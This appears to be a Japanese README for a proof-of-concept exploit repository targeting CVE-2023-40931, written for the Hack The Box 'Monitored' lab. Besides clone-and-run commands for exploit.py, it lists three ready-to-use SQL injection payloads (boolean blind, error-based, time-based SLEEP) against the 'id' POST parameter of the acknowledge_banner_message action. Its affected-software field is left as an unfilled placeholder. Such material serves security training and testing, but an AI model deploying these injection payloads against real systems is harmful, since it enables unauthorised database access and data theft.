
HTB MONITORED 向けに作成された CVE-2023-40931 の Proof of Concept
このリポジトリには、[影響を受けるソフトウェア/システム] で特定されたセキュリティ脆弱性 CVE-2023-40931 の概念実証 (PoC) が含まれています。このリポジトリの目的は、教育および研究目的のみで脆弱性を実証することです。🛠️
このプロジェクトは、教育目的および許可されたテストのみを対象としています。このコードの誤用は法的な結果を招く可能性があります。著者は、このコードによって引き起こされた誤用や損害について一切責任を負いません。システムをテストする前に、必ず適切な許可を取得してください。🔒
詳細については、公式の CVE エントリを参照してください: CVE-2023-40931。🔗
リポジトリをクローンします:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
POST パラメータ 'id' は脆弱です。次のペイロードは脆弱性の悪用に成功しました:
ブールベースのブラインド: このペイロードは、条件文を利用してクエリの真偽値を判定し、ブール論理によるデータ抽出を可能にします。
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))エラーベース: このペイロードは、特定のエラーを発生させてデータベースのエラーメッセージを利用し、情報を抽出します。
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)時間ベースのブラインド: このペイロードは、サーバーの応答時間を観察して時間遅延を利用し、情報を推測します。
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)これらのペイロードは、この脆弱性が SQL インジェクション攻撃に対して影響を受けやすいことを示しています。慎重に進め、テスト前に必ず適切な許可を取得してください。🔒
exploit.py ファイルの指示に従って PoC を実行します。🧑💻
注記: 必要な依存関係がインストールされていることを確認してください。✅